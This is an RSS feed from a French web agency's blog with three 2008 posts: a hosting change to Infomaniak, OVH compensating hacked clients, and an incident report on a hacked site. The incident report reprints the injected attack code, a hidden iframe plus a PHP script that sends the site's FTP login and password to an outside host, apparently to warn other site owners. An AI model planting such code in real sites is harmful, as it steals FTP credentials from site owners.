<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>NEOMA Interactive : concevoir le web développement durable &#187; hébergement</title>
	<atom:link href="http://www.neoma-interactive.com/tag/hebergement/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.neoma-interactive.com</link>
	<description>NEOMA Interactive : conseil, design interactif, ergonomie et conception numérique</description>
	<lastBuildDate>Wed, 08 Feb 2012 17:41:03 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Changement d&#8217;hébergeur</title>
		<link>http://www.neoma-interactive.com/2008/11/10/changement-dhebergeur/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=changement-dhebergeur</link>
		<comments>http://www.neoma-interactive.com/2008/11/10/changement-dhebergeur/#comments</comments>
		<pubDate>Mon, 10 Nov 2008 11:09:50 +0000</pubDate>
		<dc:creator>Christophe</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[développement durable]]></category>
		<category><![CDATA[environnement]]></category>
		<category><![CDATA[hébergement]]></category>
		<category><![CDATA[la boîte]]></category>

		<guid isPermaLink="false">http://www.neoma-interactive.com/?p=1026</guid>
		<description><![CDATA[Sans s&#8217;attarder sur les motifs qui nous ont fait changer d&#8217;hébergeur, voici donc venu le temps des rires et des chants auprès d&#8217;Infomaniak Network. A nous les vertes prairies des alpages suisses puisque, raison qui a particulièrement retenue notre attention, Infomaniak applique (et communique !) une charte écologique auprès de ses postes-serveurs, de ses locaux, [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignnone size-full wp-image-1027" title="infomaniak" src="http://www.neoma-interactive.com/wp-content/uploads/infomaniak.jpg" alt="banniere hébergeur Infomaniak" width="460" height="150" /></p>
<p>Sans s&#8217;attarder sur les motifs qui nous ont fait changer d&#8217;hébergeur, voici donc venu le temps des rires et des chants auprès d&#8217;<a title="site internet de l'hébergeur suisse Infomaniak" href="http://www.infomaniac.ch">Infomaniak Network</a>.</p>
<p><span id="more-1026"></span></p>
<p>A nous les vertes prairies des alpages suisses puisque, raison qui a particulièrement retenue notre attention, Infomaniak applique (et communique !) une charte écologique auprès de ses postes-serveurs, de ses locaux, de la gestion énergétique, des déchets et des engagements vis-à-vis de ses salariés sur leur mode de transport par exemple ! Si vous êtes intéressé, sensible, curieux, ou tout à la fois, voici le détail de <a title="charte écologique d'Infomaniak" href="http://www.infomaniac.ch/ecology/">la charte environnementale d&#8217;Infomaniak</a>.</p>
<p>Cette <strong>démarche écologique</strong> correspond parfaitement à notre mentalité et à nos exigences : il est donc tout à fait logique que, se l&#8217;appliquant à nous-même, nous le demandons également à nos fournisseurs ! Et cela commence par notre hébergeur.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.neoma-interactive.com/2008/11/10/changement-dhebergeur/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>OVH rembourse 150.000 euros aux personnes piratées</title>
		<link>http://www.neoma-interactive.com/2008/09/11/ovh-rembourse-150000-euros-aux-personnes-piratees/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=ovh-rembourse-150000-euros-aux-personnes-piratees</link>
		<comments>http://www.neoma-interactive.com/2008/09/11/ovh-rembourse-150000-euros-aux-personnes-piratees/#comments</comments>
		<pubDate>Thu, 11 Sep 2008 10:05:21 +0000</pubDate>
		<dc:creator>Christophe</dc:creator>
				<category><![CDATA[Développement]]></category>
		<category><![CDATA[hébergement]]></category>
		<category><![CDATA[webdéveloppement]]></category>

		<guid isPermaLink="false">http://www.neoma-interactive.com/?p=871</guid>
		<description><![CDATA[Faisant suite à mon article &#171;&#160;Site hacké craqué&#171;&#160;, une information confirme nos doutes concernant la vague d&#8217;attaques touchant depuis mai 2008 certains hébergeurs, dont OVH. Ces derniers démentaient plus ou moins l&#8217;information quand nous l&#8217;évoquions avec eux, la hotline préférant nous orienter vers notre incapacité professionnelle ou nos manques de mises à jour sur les [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignnone size-full wp-image-467" title="Cylon de la série-tv Battlestar Galactica" src="http://www.neoma-interactive.com/wp-content/uploads/cylon-battlestar-galactica.jpg" alt="Cylon de la série-tv Battlestar Galactica" width="250" height="180" /></p>
<p>Faisant suite à mon article &laquo;&nbsp;<a title="'Site hacké craqué', un article de Neoma-Interactive" href="http://www.neoma-interactive.com/2008/07/10/site-hacke-craque/">Site hacké craqué</a>&laquo;&nbsp;, une information confirme nos doutes concernant la <strong>vague d&#8217;attaques touchant depuis mai 2008 certains hébergeurs</strong>, dont OVH. Ces derniers démentaient plus ou moins l&#8217;information quand nous l&#8217;évoquions avec eux, la hotline préférant nous orienter vers notre incapacité professionnelle ou nos manques de mises à jour sur les CMS&#8230; Force est de constater que le dédommagement sonnant et trébuchant de certains sites piratés prouve le contraire !<span id="more-871"></span></p>
<p>L&#8217;info du 28 août 2008 a été découverte par Didier Rocton, ce matin sur le site de Zataz : &laquo;&nbsp;<a title="OVH rend 150.000 euros à des personnes piratées" href="http://www.zataz.com/news/17704/OVH--serveur-dedie-pirate--abus--remboursement--securite-efficace.html">OVH rend 150.000 euros à des personnes piratées</a>&laquo;&nbsp;. La piste la plus probable qui pouvait expliquer l&#8217;usurpation des identifiants ftp y est évoquée :</p>
<blockquote><p>(&#8230;) la victime est observée en temps réel par les pirates qui enregistrent les informations de l&#8217;ordinateur piégé. L&#8217;exploitation d&#8217;un cheval de Troie et d&#8217;un Keylogueur semble être les outils de prédilections de ces pirates. &laquo;&nbsp;Une fois que la victime est couché, indique OVH, le hackeur reprend la connexion VNC pour usurper son identité en passant par le propre PC de la victime et en passant les commandes de &#8230; serveurs dédiés ou/et des hébergements mutualisés dans le but de voler les cartes bancaires &#8230; Ainsi de suite.&nbsp;&raquo;</p></blockquote>
<p>Les autres explications fournies par OVH ne sont pas trés claires. Ce qui est certain c&#8217;est que les règles de sécurité ont été modifiées mais non communiquées auprès des clients : nous en avons fait l&#8217;amer constat par une plainte d&#8217;un de nos client dont le service e-marchand ne fonctionnait soudainement plus !</p>
<p><strong>Comme quoi :</strong> nos doutes et nos questions sans réponse justifiaient plutôt notre compétence et notre expérience professionnelle !</p>
<p><strong>NB :</strong> je précise que nous n&#8217;en voulons pas particulièrement à OVH puisque l&#8217;attaque massive a touché d&#8217;autres hébergeurs et d&#8217;autres sites sans CMS. Simplement, devant les explications fournies il est bon de rétablir l&#8217;équilibre : nos clients apprécient, eux, ce genre d&#8217;explication !</p>
]]></content:encoded>
			<wfw:commentRss>http://www.neoma-interactive.com/2008/09/11/ovh-rembourse-150000-euros-aux-personnes-piratees/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Site hacké craqué</title>
		<link>http://www.neoma-interactive.com/2008/07/10/site-hacke-craque/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=site-hacke-craque</link>
		<comments>http://www.neoma-interactive.com/2008/07/10/site-hacke-craque/#comments</comments>
		<pubDate>Thu, 10 Jul 2008 10:16:12 +0000</pubDate>
		<dc:creator>Christophe</dc:creator>
				<category><![CDATA[Développement]]></category>
		<category><![CDATA[hébergement]]></category>
		<category><![CDATA[webdéveloppement]]></category>

		<guid isPermaLink="false">http://www.neoma-interactive.com/2008/07/10/site-hacke-craque/</guid>
		<description><![CDATA[Découvert il y a quelques jours, un de nos sites a été violé par un hacker qui s&#8217;est gentillement introduit sur le FTP. Les motifs ou l&#8217;origine n&#8217;ayant toujours aucune explication, il est bon de détailler ici la méthode de crack afin de diffuser l&#8217;information. L&#8217;auteur (sûrement un robot puisque selon les logs l&#8217;opération s&#8217;effectue [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.neoma-interactive.com/wp-content/uploads/cylon-battlestar-galactica.jpg" alt="Cylon de la série-tv Battlestar Galactica" /></p>
<p>Découvert il y a quelques jours, <strong>un de nos sites a été violé par un hacker qui s&#8217;est gentillement introduit sur le FTP</strong>. Les motifs ou l&#8217;origine n&#8217;ayant toujours aucune explication, il est bon de détailler ici la méthode de crack afin de diffuser l&#8217;information.<span id="more-466"></span></p>
<p>L&#8217;auteur (sûrement un robot puisque selon les logs l&#8217;opération s&#8217;effectue en 9 secondes !) installe dans le fichier d&#8217;index principal (.html, .php ou autre) dès la première ligne l&#8217;entête suivant :<br />
<code>&lt;iframe style="width:0px; height:0px; border: 0px" src="UPLDR\gogo.php"&gt;&lt;/iframe&gt;</code></p>
<p>Parallèlement il crée un répertoire UPLDR/ contenant deux fichiers : &laquo;&nbsp;already.sent&nbsp;&raquo; et &laquo;&nbsp;gogo.php&nbsp;&raquo;. Ce dernier contient :<br />
<code>&lt;?<br />
$ftp_name ="ftp://monlogin_ftp:monmotdepasse_ftp &lt;at&gt; ftp.monadressedomaine.com";<br />
$remote_host = "http://alojados.com/images/put.php";<br />
if (file_exists("already.sent"))<br />
{<br />
exit(0);<br />
} else<br />
{<br />
$fp = fopen("already.sent", "w");<br />
fclose($fp);<br />
}<br />
?&gt;<br />
&lt;html&gt;&lt;head&gt;&lt;meta http-equiv="Refresh" content="0;url=&lt;?echo<br />
$remote_host."?srv=".$_SERVER['SERVER_NAME']."&amp;ftp=".$ftp_name;?&gt;"&gt;&lt;/head&gt;</code></p>
<p>Malin ! Le véritable travail s&#8217;effectue sur le fameux fichier distant &laquo;&nbsp;put.php&nbsp;&raquo; permettant de naviguer tranquillement sur le FTP du site puisque les accès log/pass sont récupérés.</p>
<p>La recherche du propriétaire du domaine nous conduit à Séville en Espagne. Mais vue l&#8217;ampleur de l&#8217;attaque, puisque de nombreux sites français et allemands ont été également touchés depuis le 21 juin 2008, je pense que les informations trouvées si facilement cache un hacking plus ambitieux que l&#8217;unique fait d&#8217;un &#8216;petit cracker qui s&#8217;amuse&#8217;&#8230;</p>
<p>La question à résoudre est : <strong>comment les accès FTP ont pu être dérobés ?</strong><br />
Constats communs aux sites victimes :</p>
<ul>
<li>ils ont été développés avec des CMS différents et de versions différentes ;</li>
<li>certains n&#8217;ont pas de CMS : ainsi le notre n&#8217;est qu&#8217;une page html appelant un swf via SWFobject ;</li>
<li>ils sont parfois administrés par des logiciels FTP (type Filezilla, voire DreamWeaver), parfois directement administrés en FTP depuis un navigateur web ;</li>
<li>ils ont des hébergeurs différents avec des services d&#8217;hébergement différents ;</li>
<li>les accès ftp ont pour certains été échangés en interne par mail, d&#8217;autre jamais !</li>
</ul>
<p>Alerté, de notre côté un contact technique chez OVH n&#8217;a pas trouvé d&#8217;autres réponses que : &laquo;&nbsp;vous devez mettre à jour votre CMS !&nbsp;&raquo;. Point final de l&#8217;échange possible = no comment !</p>
<p>Si vous avez vécu ou vivez la même expérience, si vous avez plus d&#8217;explication sur le schmilblick, n&#8217;hésitez pas à intervenir ou à prendre contact directement avec nous.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.neoma-interactive.com/2008/07/10/site-hacke-craque/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
	</channel>
</rss>

